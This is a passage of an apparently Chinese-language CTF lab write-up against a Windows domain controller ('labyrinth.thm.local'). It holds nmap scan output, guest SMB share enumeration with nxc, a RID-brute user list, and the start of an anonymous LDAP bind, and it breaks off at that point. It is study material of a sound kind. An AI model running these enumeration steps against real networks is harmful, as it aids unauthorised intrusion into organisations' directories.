| MD5:   3035:9142:71c4:e9d2:6db3:eef7:bcd4:f618
| SHA-1: 220b:3525:6ad7:13d8:ee08:c91f:0ba9:cacf:dbd5:5792
| -----BEGIN CERTIFICATE-----
| MIIGNjCCBR6gAwIBAgITSwAAABd5l36UBxyEsgAAAAAAFzANBgkqhkiG9w0BAQsF
| ADBHMRUwEwYKCZImiZPyLGQBGRYFbG9jYWwxEzARBgoJkiaJk/IsZAEZFgN0aG0x
| GTAXBgNVBAMTEHRobS1MQUJZUklOVEgtQ0EwHhcNMjYwOTA4MTA1MjA2WhcNMjcw
| OTA4MTA1MjA2WjAeMRwwGgYDVQQDExNsYWJ5cmludGgudGhtLmxvY2FsMIIBIjAN
| BgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuIpRgB6hsAQ3SJ2X28QiAe7dyvX+
| cufKmoJk2s3U1oXICPFlU2ah3x3mcSUQx9J3n9TUbXWUKpHpMK7hvQiJ1Nzk0ScT
| kVsdzVku0SaUcRxXC9Led6qUdkkW0WCCPf48ANbmxpHBh8me0kEwgR/c26VgTUei
| ZMpco/fWWKYOPKVaoiTkKwH2cCkgl3euqa824T6ZBHMlPvgZMAUsamxMgP5xZja9
| YF/DJjALGv6T6RjbNO3iu4huMIaiIUWiolozGO8ZpT6xaevpTGaLRXHBktlcyG3y
| lyYF2DKV4/9TYayHPjwlupNxJ8aMMVvtsntGsPIMkSlwvYIusbcYkBJj3QIDAQAB
| o4IDQjCCAz4wLwYJKwYBBAGCNxQCBCIeIABEAG8AbQBhAGkAbgBDAG8AbgB0AHIA
| bwBsAGwAZQByMB0GA1UdJQQWMBQGCCsGAQUFBwMCBggrBgEFBQcDATAOBgNVHQ8B
| Af8EBAMCBaAweAYJKoZIhvcNAQkPBGswaTAOBggqhkiG9w0DAgICAIAwDgYIKoZI
| hvcNAwQCAgCAMAsGCWCGSAFlAwQBKjALBglghkgBZQMEAS0wCwYJYIZIAWUDBAEC
| MAsGCWCGSAFlAwQBBTAHBgUrDgMCBzAKBggqhkiG9w0DBzAdBgNVHQ4EFgQUtuOV
| PgGlHEviwyQff0+/Jy2x2gYwHwYDVR0jBBgwFoAUCXC348VycpOwcQwjQqSW/b4C
| HRMwgc4GA1UdHwSBxjCBwzCBwKCBvaCBuoaBt2xkYXA6Ly8vQ049dGhtLUxBQllS
| SU5USC1DQSxDTj1sYWJ5cmludGgsQ049Q0RQLENOPVB1YmxpYyUyMEtleSUyMFNl
| cnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9dGhtLERDPWxv
| Y2FsP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q/YmFzZT9vYmplY3RDbGFzcz1j
| UkxEaXN0cmlidXRpb25Qb2ludDCBwAYIKwYBBQUHAQEEgbMwgbAwga0GCCsGAQUF
| BzAChoGgbGRhcDovLy9DTj10aG0tTEFCWVJJTlRILUNBLENOPUFJQSxDTj1QdWJs
| aWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9u
| LERDPXRobSxEQz1sb2NhbD9jQUNlcnRpZmljYXRlP2Jhc2U/b2JqZWN0Q2xhc3M9
| Y2VydGlmaWNhdGlvbkF1dGhvcml0eTA/BgNVHREEODA2oB8GCSsGAQQBgjcZAaAS
| BBD12WVTnqWuQJRIswNyBhF8ghNsYWJ5cmludGgudGhtLmxvY2FsME0GCSsGAQQB
| gjcZAgRAMD6gPAYKKwYBBAGCNxkCAaAuBCxTLTEtNS0yMS0xOTY2NTMwNjAxLTMx
| ODU1MTA3MTItMTA2MDQ2MjQtMTAwODANBgkqhkiG9w0BAQsFAAOCAQEAhVwZj0p5
| eeSwPbUfFREsn3kjt3lOv7DYG+0hWT3SSJ3LUaoikS23ed+KVlgyPdM5POIkEB8V
| 5lNkuTenieenepIF105ci/YfQCEvKaorhsjmKyov8QD0stMjBocBvNq8rGwnLra9
| WCdX1wLcBQx6MTaknH4w5org4eHcX6Imlk67bXaBNAsr/QrH7LWpWeT0+pB8IVH2
| oWuBwgjAIVY43RXuYWj7JT2Gzt4xfpkHoy+7BGmzQqQXeD34akdo2S5DxEaaaMCc
| iEGaH2itv0A79ARYUUPdixYhB1llJ+N8WyKbyGvEVDZrJ2Hbx0qjz+cSFXry6UvY
| BQTC3I4XFfVSGA==
|_-----END CERTIFICATE-----
|_ssl-date: 2026-09-08T11:09:31+00:00; -1s from scanner time.
443/tcp   open   ssl/http      syn-ack ttl 128 Microsoft IIS httpd 10.0
|_ssl-date: 2026-09-08T11:09:31+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=thm-LABYRINTH-CA/domainComponent=thm
| Issuer: commonName=thm-LABYRINTH-CA/domainComponent=thm
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-05-12T07:26:00
| Not valid after:  2028-05-12T07:35:59
| MD5:   c249:3bc6:fd31:f2aa:83cb:2774:bc66:9151
| SHA-1: 397a:54df:c1ff:f9fd:57e4:a944:00e8:cfdb:6e3a:972b
| -----BEGIN CERTIFICATE-----
| MIIDaTCCAlGgAwIBAgIQUiXALddQ7bNA6YS8dfCQKTANBgkqhkiG9w0BAQsFADBH
| MRUwEwYKCZImiZPyLGQBGRYFbG9jYWwxEzARBgoJkiaJk/IsZAEZFgN0aG0xGTAX
| BgNVBAMTEHRobS1MQUJZUklOVEgtQ0EwHhcNMjMwNTEyMDcyNjAwWhcNMjgwNTEy
| MDczNTU5WjBHMRUwEwYKCZImiZPyLGQBGRYFbG9jYWwxEzARBgoJkiaJk/IsZAEZ
| FgN0aG0xGTAXBgNVBAMTEHRobS1MQUJZUklOVEgtQ0EwggEiMA0GCSqGSIb3DQEB
| AQUAA4IBDwAwggEKAoIBAQC/NNh6IN5jNgejLjqq9/RVDR42kxE0UZvnW6cB1LNb
| 0c4GyNmA1h+oLDpz1DonC3Yhp9XPQJIj4ejN1ErCQFMAxW4Xcd/Gt/LSCjdBHgmR
| R8wItUOpOoXkQtVRUE4I7vlWzxBuCVo644NaNzbfqVj7M1/nCBjn/PPd2fX3etSX
| EsaI6bYcdmKRimC/94UP8qTs6Z+KGasXUmb7Sj8vscncY8lFLe9qREuiRrom5Q8A
| NySO4t8mtmqIHrBb8zTTZ9N/HxEOPDafCSTOjRhDVsOXVuWllTJujjSu+jJlBiF/
| aiXM7mOmsxH1rqCUK9mhZFSf/OhvgsvAq66sTBs1huE1AgMBAAGjUTBPMAsGA1Ud
| DwQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MB0GA1UdDgQWBBQJcLfjxXJyk7BxDCNC
| pJb9vgIdEzAQBgkrBgEEAYI3FQEEAwIBADANBgkqhkiG9w0BAQsFAAOCAQEAmnUK
| Wj9AoBc2fuoVml4Orlg+ce7x+1IBTpqeKaobBx/ez+i5mV2U45MgPHPwjHzf15bn
| 0BnYpJUhlEljx7+voM+pfP/9Q21v5iXjgIcH9FLau2nqhcQOnttNj8I4aoDr5rRG
| fJJv+hAuNXxr/Fy5M7oghCpNqxseEU9OcgIPRHp6X/8bTtEYWaHnD3GS6uUR2jai
| PhReAcCPTbRwMRA3KsGRaBF3+PsIOL0JtCR+QGfOugPhUJFOU7w0dwbFmzfRcgKw
| bJhEy3o0FL5aqKVC823QJE7LosyLdtAqtZY7OgtT0Do7RZzdsZ1If0JmYmHTSRVz
| 8CvPpcCDp68aiTtqgA==
|_-----END CERTIFICATE-----
| tls-alpn: 
|_  http/1.1
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
445/tcp   open   microsoft-ds? syn-ack ttl 128
464/tcp   open   kpasswd5?     syn-ack ttl 128
593/tcp   open   ncacn_http    syn-ack ttl 128 Microsoft Windows RPC over HTTP 1.0
636/tcp   open   ssl/ldap      syn-ack ttl 128 Microsoft Windows Active Directory LDAP (Domain: thm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2026-09-08T11:09:31+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=labyrinth.thm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::&lt;unsupported&gt;, DNS:labyrinth.thm.local
| Issuer: commonName=thm-LABYRINTH-CA/domainComponent=thm
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-09-08T10:52:06
| Not valid after:  2027-09-08T10:52:06
| MD5:   3035:9142:71c4:e9d2:6db3:eef7:bcd4:f618
| SHA-1: 220b:3525:6ad7:13d8:ee08:c91f:0ba9:cacf:dbd5:5792
| -----BEGIN CERTIFICATE-----
| MIIGNjCCBR6gAwIBAgITSwAAABd5l36UBxyEsgAAAAAAFzANBgkqhkiG9w0BAQsF
| ADBHMRUwEwYKCZImiZPyLGQBGRYFbG9jYWwxEzARBgoJkiaJk/IsZAEZFgN0aG0x
| GTAXBgNVBAMTEHRobS1MQUJZUklOVEgtQ0EwHhcNMjYwOTA4MTA1MjA2WhcNMjcw
| OTA4MTA1MjA2WjAeMRwwGgYDVQQDExNsYWJ5cmludGgudGhtLmxvY2FsMIIBIjAN
| BgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuIpRgB6hsAQ3SJ2X28QiAe7dyvX+
| cufKmoJk2s3U1oXICPFlU2ah3x3mcSUQx9J3n9TUbXWUKpHpMK7hvQiJ1Nzk0ScT
| kVsdzVku0SaUcRxXC9Led6qUdkkW0WCCPf48ANbmxpHBh8me0kEwgR/c26VgTUei
| ZMpco/fWWKYOPKVaoiTkKwH2cCkgl3euqa824T6ZBHMlPvgZMAUsamxMgP5xZja9
| YF/DJjALGv6T6RjbNO3iu4huMIaiIUWiolozGO8ZpT6xaevpTGaLRXHBktlcyG3y
| lyYF2DKV4/9TYayHPjwlupNxJ8aMMVvtsntGsPIMkSlwvYIusbcYkBJj3QIDAQAB
| o4IDQjCCAz4wLwYJKwYBBAGCNxQCBCIeIABEAG8AbQBhAGkAbgBDAG8AbgB0AHIA
| bwBsAGwAZQByMB0GA1UdJQQWMBQGCCsGAQUFBwMCBggrBgEFBQcDATAOBgNVHQ8B
| Af8EBAMCBaAweAYJKoZIhvcNAQkPBGswaTAOBggqhkiG9w0DAgICAIAwDgYIKoZI
| hvcNAwQCAgCAMAsGCWCGSAFlAwQBKjALBglghkgBZQMEAS0wCwYJYIZIAWUDBAEC
| MAsGCWCGSAFlAwQBBTAHBgUrDgMCBzAKBggqhkiG9w0DBzAdBgNVHQ4EFgQUtuOV
| PgGlHEviwyQff0+/Jy2x2gYwHwYDVR0jBBgwFoAUCXC348VycpOwcQwjQqSW/b4C
| HRMwgc4GA1UdHwSBxjCBwzCBwKCBvaCBuoaBt2xkYXA6Ly8vQ049dGhtLUxBQllS
| SU5USC1DQSxDTj1sYWJ5cmludGgsQ049Q0RQLENOPVB1YmxpYyUyMEtleSUyMFNl
| cnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9dGhtLERDPWxv
| Y2FsP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q/YmFzZT9vYmplY3RDbGFzcz1j
| UkxEaXN0cmlidXRpb25Qb2ludDCBwAYIKwYBBQUHAQEEgbMwgbAwga0GCCsGAQUF
| BzAChoGgbGRhcDovLy9DTj10aG0tTEFCWVJJTlRILUNBLENOPUFJQSxDTj1QdWJs
| aWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9u
| LERDPXRobSxEQz1sb2NhbD9jQUNlcnRpZmljYXRlP2Jhc2U/b2JqZWN0Q2xhc3M9
| Y2VydGlmaWNhdGlvbkF1dGhvcml0eTA/BgNVHREEODA2oB8GCSsGAQQBgjcZAaAS
| BBD12WVTnqWuQJRIswNyBhF8ghNsYWJ5cmludGgudGhtLmxvY2FsME0GCSsGAQQB
| gjcZAgRAMD6gPAYKKwYBBAGCNxkCAaAuBCxTLTEtNS0yMS0xOTY2NTMwNjAxLTMx
| ODU1MTA3MTItMTA2MDQ2MjQtMTAwODANBgkqhkiG9w0BAQsFAAOCAQEAhVwZj0p5
| eeSwPbUfFREsn3kjt3lOv7DYG+0hWT3SSJ3LUaoikS23ed+KVlgyPdM5POIkEB8V
| 5lNkuTenieenepIF105ci/YfQCEvKaorhsjmKyov8QD0stMjBocBvNq8rGwnLra9
| WCdX1wLcBQx6MTaknH4w5org4eHcX6Imlk67bXaBNAsr/QrH7LWpWeT0+pB8IVH2
| oWuBwgjAIVY43RXuYWj7JT2Gzt4xfpkHoy+7BGmzQqQXeD34akdo2S5DxEaaaMCc
| iEGaH2itv0A79ARYUUPdixYhB1llJ+N8WyKbyGvEVDZrJ2Hbx0qjz+cSFXry6UvY
| BQTC3I4XFfVSGA==
|_-----END CERTIFICATE-----
3268/tcp  open   ldap          syn-ack ttl 128 Microsoft Windows Active Directory LDAP (Domain: thm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2026-09-08T11:09:31+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=labyrinth.thm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::&lt;unsupported&gt;, DNS:labyrinth.thm.local
| Issuer: commonName=thm-LABYRINTH-CA/domainComponent=thm
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-09-08T10:52:06
| Not valid after:  2027-09-08T10:52:06
| MD5:   3035:9142:71c4:e9d2:6db3:eef7:bcd4:f618
| SHA-1: 220b:3525:6ad7:13d8:ee08:c91f:0ba9:cacf:dbd5:5792
| -----BEGIN CERTIFICATE-----
| MIIGNjCCBR6gAwIBAgITSwAAABd5l36UBxyEsgAAAAAAFzANBgkqhkiG9w0BAQsF
| ADBHMRUwEwYKCZImiZPyLGQBGRYFbG9jYWwxEzARBgoJkiaJk/IsZAEZFgN0aG0x
| GTAXBgNVBAMTEHRobS1MQUJZUklOVEgtQ0EwHhcNMjYwOTA4MTA1MjA2WhcNMjcw
| OTA4MTA1MjA2WjAeMRwwGgYDVQQDExNsYWJ5cmludGgudGhtLmxvY2FsMIIBIjAN
| BgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuIpRgB6hsAQ3SJ2X28QiAe7dyvX+
| cufKmoJk2s3U1oXICPFlU2ah3x3mcSUQx9J3n9TUbXWUKpHpMK7hvQiJ1Nzk0ScT
| kVsdzVku0SaUcRxXC9Led6qUdkkW0WCCPf48ANbmxpHBh8me0kEwgR/c26VgTUei
| ZMpco/fWWKYOPKVaoiTkKwH2cCkgl3euqa824T6ZBHMlPvgZMAUsamxMgP5xZja9
| YF/DJjALGv6T6RjbNO3iu4huMIaiIUWiolozGO8ZpT6xaevpTGaLRXHBktlcyG3y
| lyYF2DKV4/9TYayHPjwlupNxJ8aMMVvtsntGsPIMkSlwvYIusbcYkBJj3QIDAQAB
| o4IDQjCCAz4wLwYJKwYBBAGCNxQCBCIeIABEAG8AbQBhAGkAbgBDAG8AbgB0AHIA
| bwBsAGwAZQByMB0GA1UdJQQWMBQGCCsGAQUFBwMCBggrBgEFBQcDATAOBgNVHQ8B
| Af8EBAMCBaAweAYJKoZIhvcNAQkPBGswaTAOBggqhkiG9w0DAgICAIAwDgYIKoZI
| hvcNAwQCAgCAMAsGCWCGSAFlAwQBKjALBglghkgBZQMEAS0wCwYJYIZIAWUDBAEC
| MAsGCWCGSAFlAwQBBTAHBgUrDgMCBzAKBggqhkiG9w0DBzAdBgNVHQ4EFgQUtuOV
| PgGlHEviwyQff0+/Jy2x2gYwHwYDVR0jBBgwFoAUCXC348VycpOwcQwjQqSW/b4C
| HRMwgc4GA1UdHwSBxjCBwzCBwKCBvaCBuoaBt2xkYXA6Ly8vQ049dGhtLUxBQllS
| SU5USC1DQSxDTj1sYWJ5cmludGgsQ049Q0RQLENOPVB1YmxpYyUyMEtleSUyMFNl
| cnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9dGhtLERDPWxv
| Y2FsP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q/YmFzZT9vYmplY3RDbGFzcz1j
| UkxEaXN0cmlidXRpb25Qb2ludDCBwAYIKwYBBQUHAQEEgbMwgbAwga0GCCsGAQUF
| BzAChoGgbGRhcDovLy9DTj10aG0tTEFCWVJJTlRILUNBLENOPUFJQSxDTj1QdWJs
| aWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9u
| LERDPXRobSxEQz1sb2NhbD9jQUNlcnRpZmljYXRlP2Jhc2U/b2JqZWN0Q2xhc3M9
| Y2VydGlmaWNhdGlvbkF1dGhvcml0eTA/BgNVHREEODA2oB8GCSsGAQQBgjcZAaAS
| BBD12WVTnqWuQJRIswNyBhF8ghNsYWJ5cmludGgudGhtLmxvY2FsME0GCSsGAQQB
| gjcZAgRAMD6gPAYKKwYBBAGCNxkCAaAuBCxTLTEtNS0yMS0xOTY2NTMwNjAxLTMx
| ODU1MTA3MTItMTA2MDQ2MjQtMTAwODANBgkqhkiG9w0BAQsFAAOCAQEAhVwZj0p5
| eeSwPbUfFREsn3kjt3lOv7DYG+0hWT3SSJ3LUaoikS23ed+KVlgyPdM5POIkEB8V
| 5lNkuTenieenepIF105ci/YfQCEvKaorhsjmKyov8QD0stMjBocBvNq8rGwnLra9
| WCdX1wLcBQx6MTaknH4w5org4eHcX6Imlk67bXaBNAsr/QrH7LWpWeT0+pB8IVH2
| oWuBwgjAIVY43RXuYWj7JT2Gzt4xfpkHoy+7BGmzQqQXeD34akdo2S5DxEaaaMCc
| iEGaH2itv0A79ARYUUPdixYhB1llJ+N8WyKbyGvEVDZrJ2Hbx0qjz+cSFXry6UvY
| BQTC3I4XFfVSGA==
|_-----END CERTIFICATE-----
3269/tcp  open   ssl/ldap      syn-ack ttl 128 Microsoft Windows Active Directory LDAP (Domain: thm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2026-09-08T11:09:31+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=labyrinth.thm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::&lt;unsupported&gt;, DNS:labyrinth.thm.local
| Issuer: commonName=thm-LABYRINTH-CA/domainComponent=thm
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-09-08T10:52:06
| Not valid after:  2027-09-08T10:52:06
| MD5:   3035:9142:71c4:e9d2:6db3:eef7:bcd4:f618
| SHA-1: 220b:3525:6ad7:13d8:ee08:c91f:0ba9:cacf:dbd5:5792
| -----BEGIN CERTIFICATE-----
| MIIGNjCCBR6gAwIBAgITSwAAABd5l36UBxyEsgAAAAAAFzANBgkqhkiG9w0BAQsF
| ADBHMRUwEwYKCZImiZPyLGQBGRYFbG9jYWwxEzARBgoJkiaJk/IsZAEZFgN0aG0x
| GTAXBgNVBAMTEHRobS1MQUJZUklOVEgtQ0EwHhcNMjYwOTA4MTA1MjA2WhcNMjcw
| OTA4MTA1MjA2WjAeMRwwGgYDVQQDExNsYWJ5cmludGgudGhtLmxvY2FsMIIBIjAN
| BgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuIpRgB6hsAQ3SJ2X28QiAe7dyvX+
| cufKmoJk2s3U1oXICPFlU2ah3x3mcSUQx9J3n9TUbXWUKpHpMK7hvQiJ1Nzk0ScT
| kVsdzVku0SaUcRxXC9Led6qUdkkW0WCCPf48ANbmxpHBh8me0kEwgR/c26VgTUei
| ZMpco/fWWKYOPKVaoiTkKwH2cCkgl3euqa824T6ZBHMlPvgZMAUsamxMgP5xZja9
| YF/DJjALGv6T6RjbNO3iu4huMIaiIUWiolozGO8ZpT6xaevpTGaLRXHBktlcyG3y
| lyYF2DKV4/9TYayHPjwlupNxJ8aMMVvtsntGsPIMkSlwvYIusbcYkBJj3QIDAQAB
| o4IDQjCCAz4wLwYJKwYBBAGCNxQCBCIeIABEAG8AbQBhAGkAbgBDAG8AbgB0AHIA
| bwBsAGwAZQByMB0GA1UdJQQWMBQGCCsGAQUFBwMCBggrBgEFBQcDATAOBgNVHQ8B
| Af8EBAMCBaAweAYJKoZIhvcNAQkPBGswaTAOBggqhkiG9w0DAgICAIAwDgYIKoZI
| hvcNAwQCAgCAMAsGCWCGSAFlAwQBKjALBglghkgBZQMEAS0wCwYJYIZIAWUDBAEC
| MAsGCWCGSAFlAwQBBTAHBgUrDgMCBzAKBggqhkiG9w0DBzAdBgNVHQ4EFgQUtuOV
| PgGlHEviwyQff0+/Jy2x2gYwHwYDVR0jBBgwFoAUCXC348VycpOwcQwjQqSW/b4C
| HRMwgc4GA1UdHwSBxjCBwzCBwKCBvaCBuoaBt2xkYXA6Ly8vQ049dGhtLUxBQllS
| SU5USC1DQSxDTj1sYWJ5cmludGgsQ049Q0RQLENOPVB1YmxpYyUyMEtleSUyMFNl
| cnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9dGhtLERDPWxv
| Y2FsP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q/YmFzZT9vYmplY3RDbGFzcz1j
| UkxEaXN0cmlidXRpb25Qb2ludDCBwAYIKwYBBQUHAQEEgbMwgbAwga0GCCsGAQUF
| BzAChoGgbGRhcDovLy9DTj10aG0tTEFCWVJJTlRILUNBLENOPUFJQSxDTj1QdWJs
| aWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9u
| LERDPXRobSxEQz1sb2NhbD9jQUNlcnRpZmljYXRlP2Jhc2U/b2JqZWN0Q2xhc3M9
| Y2VydGlmaWNhdGlvbkF1dGhvcml0eTA/BgNVHREEODA2oB8GCSsGAQQBgjcZAaAS
| BBD12WVTnqWuQJRIswNyBhF8ghNsYWJ5cmludGgudGhtLmxvY2FsME0GCSsGAQQB
| gjcZAgRAMD6gPAYKKwYBBAGCNxkCAaAuBCxTLTEtNS0yMS0xOTY2NTMwNjAxLTMx
| ODU1MTA3MTItMTA2MDQ2MjQtMTAwODANBgkqhkiG9w0BAQsFAAOCAQEAhVwZj0p5
| eeSwPbUfFREsn3kjt3lOv7DYG+0hWT3SSJ3LUaoikS23ed+KVlgyPdM5POIkEB8V
| 5lNkuTenieenepIF105ci/YfQCEvKaorhsjmKyov8QD0stMjBocBvNq8rGwnLra9
| WCdX1wLcBQx6MTaknH4w5org4eHcX6Imlk67bXaBNAsr/QrH7LWpWeT0+pB8IVH2
| oWuBwgjAIVY43RXuYWj7JT2Gzt4xfpkHoy+7BGmzQqQXeD34akdo2S5DxEaaaMCc
| iEGaH2itv0A79ARYUUPdixYhB1llJ+N8WyKbyGvEVDZrJ2Hbx0qjz+cSFXry6UvY
| BQTC3I4XFfVSGA==
|_-----END CERTIFICATE-----
3389/tcp  open   ms-wbt-server syn-ack ttl 128 Microsoft Terminal Services
| ssl-cert: Subject: commonName=labyrinth.thm.local
| Issuer: commonName=labyrinth.thm.local
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-09-07T11:00:55
| Not valid after:  2027-03-09T11:00:55
| MD5:   406f:254a:0632:8cff:e45e:8456:f915:b968
| SHA-1: 36f9:2b8e:4a0c:7112:13c8:95ac:e688:1b02:c597:b154
| -----BEGIN CERTIFICATE-----
| MIIC6jCCAdKgAwIBAgIQGztWNDRgaL9BztdEiAUaSDANBgkqhkiG9w0BAQsFADAe
| MRwwGgYDVQQDExNsYWJ5cmludGgudGhtLmxvY2FsMB4XDTI2MDkwNzExMDA1NVoX
| DTI3MDMwOTExMDA1NVowHjEcMBoGA1UEAxMTbGFieXJpbnRoLnRobS5sb2NhbDCC
| ASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMWdAYWVbD5nW0R51g6NbvGz
| aKSdeAPzRXjYtxiZZv7c6E0clP5ZKKW0TGfDOxK31NpZp+TXzaXIJzu0JEY5uMm5
| 41XDVzMeE5IXmI5X/hSvzWqKhSRtZ2O2SBlVSXGQoS+LbImUwVh5diEYS+BVRsKr
| 1lFDikGjjcq/wO8DoLmEz4Jh3OZTLBEfoI1dzdpQSwlis1uIiHVOf8bUw4HdiocG
| G1Na7PFqe2Fsv8vonFP6fYdPanc3aJ4DJ2xl3QERVGCJ0oy7TsIvNLpxUA/OZE9z
| K3td+OlidKIjENiRgGhQmBP43PbIlphJdYtJjPHT0wD9sErzchUwuNHtMI6SB50C
| AwEAAaMkMCIwEwYDVR0lBAwwCgYIKwYBBQUHAwEwCwYDVR0PBAQDAgQwMA0GCSqG
| SIb3DQEBCwUAA4IBAQBPUjKZMKVtG4o+9F4CK13pk4uz5YS5NwnwRY5VYs6oNp1+
| T5X44KatEgfmW46ZddNh0JpyrUS8odCQTi8TDD2y65WrmiH/+aYAUXZVqY9z2iau
| cGCfKggez7gcvaDDvDLpE42nevCeFBGE6FX+vvYYIQSKvHpovrA4/YYm40ra8bmI
| SJFVnYipveips+lg6yKXIkcbiZ4BR8aSRDvpFGQntMhoBdWRTQJj2kLLmUvChcsZ
| 67E+551f/mn+L6m0+V7Ibxtbgtn+2tMhLkIYUhv+ZKYoAKIUnqNZQK5TuXDHFAe2
| rsLETnehzi/9/n64wkXQB2pJkXlYcEgBKRz4kF41
|_-----END CERTIFICATE-----
|_ssl-date: 2026-09-08T11:09:31+00:00; -1s from scanner time.
7680/tcp  closed pando-pub     reset ttl 128
9389/tcp  open   mc-nmf        syn-ack ttl 128 .NET Message Framing
47001/tcp open   http          syn-ack ttl 128 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open   msrpc         syn-ack ttl 128 Microsoft Windows RPC
49665/tcp open   msrpc         syn-ack ttl 128 Microsoft Windows RPC
49666/tcp open   msrpc         syn-ack ttl 128 Microsoft Windows RPC
49668/tcp open   msrpc         syn-ack ttl 128 Microsoft Windows RPC
49669/tcp open   ncacn_http    syn-ack ttl 128 Microsoft Windows RPC over HTTP 1.0
49670/tcp open   msrpc         syn-ack ttl 128 Microsoft Windows RPC
49671/tcp open   msrpc         syn-ack ttl 128 Microsoft Windows RPC
49675/tcp open   msrpc         syn-ack ttl 128 Microsoft Windows RPC
49676/tcp open   msrpc         syn-ack ttl 128 Microsoft Windows RPC
49679/tcp open   msrpc         syn-ack ttl 128 Microsoft Windows RPC
49711/tcp open   msrpc         syn-ack ttl 128 Microsoft Windows RPC
49716/tcp open   msrpc         syn-ack ttl 128 Microsoft Windows RPC
49719/tcp open   msrpc         syn-ack ttl 128 Microsoft Windows RPC
Service Info: Host: LABYRINTH; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 33713/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 53510/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 54065/udp): CLEAN (Timeout)
|   Check 4 (port 16793/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| smb2-time: 
|   date: 2026-09-08T11:09:23
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
</code></pre>
<p>标准的 DC, ttl 均为 <code>128</code>, windows 默认一跳. 域名: <code>labyrinth.thm.local</code>
值得注意的是该机器没有开放 winrm, 而是开放了 <code>3389/rdp</code>. RDP 仅接受密码, 不接受 ntlm.</p>
<h2>smb</h2>
<p>没有提供凭据, 尝试 guest 认证, 成功, 可以读取 <code>IPC$</code>, 即可以通过 SMB 访问 RPC</p>
<pre><code>nxc smb thm.local -u guest -p '' --shares
SMB         10.66.139.100   445    LABYRINTH        [*] Windows 10 / Server 2019 Build 17763 x64 (name:LABYRINTH) (domain:thm.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.66.139.100   445    LABYRINTH        [+] thm.local\guest: 
SMB         10.66.139.100   445    LABYRINTH        [*] Enumerated shares
SMB         10.66.139.100   445    LABYRINTH        Share           Permissions     Remark
SMB         10.66.139.100   445    LABYRINTH        -----           -----------     ------
SMB         10.66.139.100   445    LABYRINTH        ADMIN$                          Remote Admin
SMB         10.66.139.100   445    LABYRINTH        C$                              Default share
SMB         10.66.139.100   445    LABYRINTH        IPC$            READ            Remote IPC
SMB         10.66.139.100   445    LABYRINTH        NETLOGON                        Logon server share 
SMB         10.66.139.100   445    LABYRINTH        SYSVOL                          Logon server share 
</code></pre>
<p>WINDOWS SERVER 2019, 比较老的机器</p>
<h3>rid brute</h3>
<p>爆破出很多用户,截取少部分:</p>
<pre><code>Administrator
Guest
krbtgt
Domain
Protected
LABYRINTH$
greg
SHANA_FITZGERALD
CAREY_FIELDS
DWAYNE_NGUYEN
BRANDON_PITTMAN
BRET_DONALDSON
VAUGHN_MARTIN
DICK_REEVES
EVELYN_NEWMAN
SHERI_DYER
NUMBERS_BARRETT
SUSANA_LOWERY
MIKE_TODD
JOSEF_MONROE
DAWN_DAVID
VIVIAN_VELAZQUEZ
WESLEY_FULLER
MARISOL_LANG
DIONNE_MCCOY
NOEL_BOOTH
TAMRA_BULLOCK
ROLAND_COLE
KATHY_WYNN
LORENA_BENSON
</code></pre>
<h2>ldap</h2>
<p>尝试 ldap 空绑定, 成功:</p>
<pre><code>ldapsearch -x -H ldap://10.66.139.100 -s base
# extended LDIF
#
# LDAPv3
